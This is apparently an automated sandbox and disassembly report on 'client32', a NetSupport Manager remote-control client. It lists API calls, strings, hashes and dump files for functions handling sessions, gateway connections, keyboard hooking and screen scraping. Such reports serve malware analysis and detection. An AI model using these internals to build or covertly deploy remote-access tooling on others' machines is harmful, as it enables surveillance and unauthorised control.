Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateEventMetricsSystem
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$226546$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
API String ID: 1866202007-448119206
Opcode ID: aee70f4ed861bd6a1bd0ea78582191ec02033fc93ffbc41ce3a91c5960ac96b3
Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
Opcode Fuzzy Hash: aee70f4ed861bd6a1bd0ea78582191ec02033fc93ffbc41ce3a91c5960ac96b3
Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

Function 1102D5B0 Relevance: 81.1, APIs: 15, Strings: 31, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Wtsapi32.dll, xrefs: 1102D9DC
226546, xrefs: 1102DBF5, 1102DDBB, 1102DDDF, 1102DDEC, 1102DE1C, 1102DE91
, xrefs: 1102DB65
%02d, xrefs: 1102DCE8
TCPIP, xrefs: 1102D9B5
$session$, xrefs: 1102DD66
client32.ini, xrefs: 1102D805
MacAddress, xrefs: 1102DADF
IsA(), xrefs: 1102DD29, 1102DDA8
Client, xrefs: 1102D995, 1102D9CD, 1102DAE4
Error x%x reading %s, sesh=%d, xrefs: 1102D861
WTSFreeMemory, xrefs: 1102DB11
WTSQuerySessionInformationA, xrefs: 1102DA4E
%session%, xrefs: 1102DD7A
screenscrape, xrefs: 1102D9C8
client32 dbi %hs, xrefs: 1102DE73
Warning: Unexpanded clientname=<%s>, xrefs: 1102DCA3
DisableConsoleClient, xrefs: 1102D917
TSMode, xrefs: 1102D990
30/10/15 13:45:13 V12.10F4, xrefs: 1102DE6E
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DEC0
%sessionname%, xrefs: 1102DD39, 1102DD52
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102DD24, 1102DDA3
client32, xrefs: 1102D8D5
NSMWClass, xrefs: 1102D794
ListenPort, xrefs: 1102D9B0
%s.%02d, xrefs: 1102DD00
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DAA4
ts macaddr=%s, xrefs: 1102DACC
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE9A
ClientName, xrefs: 1102DB95

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$226546$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1984265443-2842706374
Opcode ID: 264046cbf54c2cec41e4150a3278f8080541df2986705949a6843abdc29eacfb
Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
Opcode Fuzzy Hash: 264046cbf54c2cec41e4150a3278f8080541df2986705949a6843abdc29eacfb
Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

Function 68C73D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 68C73D27

Strings

A3=%s, xrefs: 68C74163
A1=%s, xrefs: 68C740AF
CMD=OPEN, xrefs: 68C73EB9
PROTOCOL_VER=%u.%u, xrefs: 68C73EEB
ListenPort, xrefs: 68C73DDA
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68C73D75
CHATID, xrefs: 68C7400A
*Dept, xrefs: 68C741F4
connection_index == 0, xrefs: 68C73D7A
client247, xrefs: 68C7400F, 68C7406B, 68C740D1, 68C7412B, 68C74185
226546, xrefs: 68C73F0C
CLIENT_ADDR=%s, xrefs: 68C73F4A
A4=%s, xrefs: 68C741BD
HOSTNAME=%s, xrefs: 68C73F9A
*Gsk, xrefs: 68C73E24
CHATID=%s, xrefs: 68C74046
PORT=%d, xrefs: 68C73F68
TCPIP, xrefs: 68C73DCF, 68C73DDF
CLIENT_VERSION=1.0, xrefs: 68C73ED0
MAXPACKET=%d, xrefs: 68C73F01
DEPT=%s, xrefs: 68C7420C
CMPI=%u, xrefs: 68C73FEA
1.1, xrefs: 68C73E02
A2=%s, xrefs: 68C74109
GSK=%s, xrefs: 68C73FCC
APPTYPE=%d, xrefs: 68C741DD
CLIENT_NAME=%s, xrefs: 68C73F17
Port, xrefs: 68C73DCA

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *Dept$*Gsk$1.1$226546$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
API String ID: 2102423945-1702074230
Opcode ID: c3139980a5ba7bd4058abdf9cd53202f8925dd1c73cc2ff16b569447b38523ad
Instruction ID: 39fe9ece704a45d2f4dfd1a14c37c8f43bb005d9c098b795d1561e17d9faef7c
Opcode Fuzzy Hash: c3139980a5ba7bd4058abdf9cd53202f8925dd1c73cc2ff16b569447b38523ad
Instruction Fuzzy Hash: FEE181B6C4052CAACB20DB649C90EFFB7789F59719F8044D9E50967141FB349B848FA1

Function 1113FBE0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,774D23A0), ref: 1113FC13
LoadLibraryA.KERNEL32(?), ref: 1113FC5C
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

Strings

SymGetOptions, xrefs: 1113FD0C
SymGetLinePrev, xrefs: 1113FCCA
MiniDumpWriteDump, xrefs: 1113FD43
SymCleanup, xrefs: 1113FCEB
SymMatchFileName, xrefs: 1113FCD5
SymInitialize, xrefs: 1113FD01
SymGetLineFromAddr, xrefs: 1113FC98
DBGHELP.DLL, xrefs: 1113FC6F, 1113FC74
SymGetSymFromAddr, xrefs: 1113FD2D
SymGetLineNext, xrefs: 1113FCBF
SymGetModuleInfo, xrefs: 1113FD22
dbghelp.dll, xrefs: 1113FC38
IMAGEHLP.DLL, xrefs: 1113FC7E, 1113FC83, 1113FC89
SymGetLineFromName, xrefs: 1113FCB7
SymSetOptions, xrefs: 1113FD17
SymLoadModule, xrefs: 1113FCF6
SymFunctionTableAccess, xrefs: 1113FD38
StackWalk, xrefs: 1113FCE3

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59

Function 1113DAD0 Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 266
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
SetLastError.KERNEL32(00000078), ref: 1113DB73
FreeLibrary.KERNEL32(00000000), ref: 1113DB85
LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
_memset.LIBCMT ref: 1113DC3D
LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
GetStockObject.GDI32(00000000), ref: 1113DC9A
LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
RegisterClassExA.USER32(?), ref: 1113DCB5

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
#17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4

Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18

Strings

UI.CPP, xrefs: 1113DC66, 1113DCC7
imm32, xrefs: 1113DBBA
riched32.dll, xrefs: 1113DECF
TraceCopyData, xrefs: 1113DDBB
*DisableDPIAware, xrefs: 1113DB25
NSMGetAppIcon(), xrefs: 1113DC6B
HookKeyboard, xrefs: 1113DD61
_debug, xrefs: 1113DDC0
NSMWClass, xrefs: 1113DC1B, 1113DCAE
pcihooks, xrefs: 1113DD4D
View, xrefs: 1113DD9E
Client, xrefs: 1113DB2A
_License, xrefs: 1113DBF6
*quiet, xrefs: 1113DBF1
InitUI (%d), xrefs: 1113DAFB
SetProcessDPIAware, xrefs: 1113DB5E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 2794364348-3534351892
Opcode ID: b6d6ce04f3def5cc6cc3f869e8e50954c13925c85cdd9e88f1608f8a91095087
Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
Opcode Fuzzy Hash: b6d6ce04f3def5cc6cc3f869e8e50954c13925c85cdd9e88f1608f8a91095087
Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56

Function 1102D679 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1

Strings

Wtsapi32.dll, xrefs: 1102D9DC
DisableConsoleClient, xrefs: 1102D917
TSMode, xrefs: 1102D990
30/10/15 13:45:13 V12.10F4, xrefs: 1102DE6E
226546, xrefs: 1102DBF5, 1102DE1C, 1102DE91
, xrefs: 1102DB65
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DEC0
TCPIP, xrefs: 1102D9B5
client32.ini, xrefs: 1102D805
MacAddress, xrefs: 1102DADF
Client, xrefs: 1102D995, 1102D9CD, 1102DAE4
ListenPort, xrefs: 1102D9B0
Error x%x reading %s, sesh=%d, xrefs: 1102D861
WTSFreeMemory, xrefs: 1102DB11
WTSQuerySessionInformationA, xrefs: 1102DA4E
screenscrape, xrefs: 1102D9C8
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DAA4
ts macaddr=%s, xrefs: 1102DACC
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE9A
ClientName, xrefs: 1102DB95
client32 dbi %hs, xrefs: 1102DE73

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $226546$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-398807400
Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

Function 68C663C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(68CAB898,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C663E8
InterlockedDecrement.KERNEL32(-0003F3B7), ref: 68C663FA
EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,68C6D77B,00000000), ref: 68C66412
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68C6643B
SetLastError.KERNEL32(00000078,?,00000000,?,68C6D77B,00000000), ref: 68C66450
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68C6646F
SetLastError.KERNEL32(00000078,?,00000000,?,68C6D77B,00000000), ref: 68C66484
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68C664A3
SetLastError.KERNEL32(00000078,?,00000000,?,68C6D77B,00000000), ref: 68C664C5
shutdown.WSOCK32(?,00000001,?,00000000,?,68C6D77B,00000000), ref: 68C664E9
GetLastError.KERNEL32(?,00000001,?,00000000,?,68C6D77B,00000000), ref: 68C664F2
timeGetTime.WINMM(?,00000001,?,00000000,?,68C6D77B,00000000), ref: 68C66510
#16.WSOCK32(?,?,00001000,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C66526
GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C66533
timeGetTime.WINMM(?,00000000,?,68C6D77B,00000000), ref: 68C66540
Sleep.KERNEL32(00000001,?,00000000,?,68C6D77B,00000000), ref: 68C6654B
#16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C66563
closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C66574
WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C6657D
Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C6658E
GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C6659E
_memset.LIBCMT ref: 68C665C8
LeaveCriticalSection.KERNEL32(?,?,68C6D77B,00000000), ref: 68C665D7
LeaveCriticalSection.KERNEL32(68CAB898,?,00000000,?,68C6D77B,00000000), ref: 68C665F2

Strings

InternetCloseHandle, xrefs: 68C66435, 68C66469, 68C6649D
CloseGatewayConnection - closesocket(%u) FAILED (%d), xrefs: 68C665A9
CloseGatewayConnection - shutdown(%u) FAILED (%d), xrefs: 68C664FD

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
API String ID: 3764039262-2631155478
Opcode ID: 67913849717f555e7ff7ecc30d09bb2ffa6f7ec9db54916c398d0f788de9bc66
Instruction ID: 3c2ba9881707ecee7d42d92e48b67c7512410ecbcfc592f9911653f5f60bf32b
Opcode Fuzzy Hash: 67913849717f555e7ff7ecc30d09bb2ffa6f7ec9db54916c398d0f788de9bc66
Instruction Fuzzy Hash: 23519C75640704EFDB10DF68C8C9F6E77B8AF89368F900124F61A97281EB70E8858B61

Function 68C698D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strncmp.LIBCMT ref: 68C6996F
_strncmp.LIBCMT ref: 68C699A5

Strings

%s, xrefs: 68C69AAA
3', xrefs: 68C69CB2
%02x %02x, xrefs: 68C69AE7
xx %02x, xrefs: 68C69AFB
abort send, gateway hungup, xrefs: 68C69D2E
NC_DATA, xrefs: 68C69969
CMD=NC_DATA, xrefs: 68C6999F
Error send returned 0 on connection %d, xrefs: 68C69CF8
Error %d sending HTTP request on connection %d, xrefs: 68C69D1F
SendHttpReq failed, not connected to gateway!, xrefs: 68C69934, 68C69B79
Error %d writing inet request on connection %d, xrefs: 68C69BE3

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

